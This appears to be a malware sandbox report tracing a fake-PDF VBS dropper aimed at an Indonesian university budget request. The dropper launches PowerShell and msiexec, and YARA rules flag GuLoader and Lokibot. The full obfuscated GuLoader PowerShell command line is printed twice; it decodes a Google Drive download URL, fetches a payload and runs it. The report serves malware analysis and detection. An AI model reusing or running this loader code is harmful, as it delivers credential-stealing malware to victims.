                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs"
                                        Imagebase:0x7ff71cf20000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:01:18:20
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? 
De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. 
Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam 
strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:01:18:20
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:01:18:37
                                        Start date:02/10/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? 
De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. 
Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam 
strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;"
                                        Imagebase:0x170000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2721566180.0000000008430000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2710566286.000000000565A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2721776675.0000000008B75000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:01:18:37
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:01:18:54
                                        Start date:02/10/2024
                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                                        Imagebase:0xa80000
                                        File size:59'904 bytes
                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        No disassembly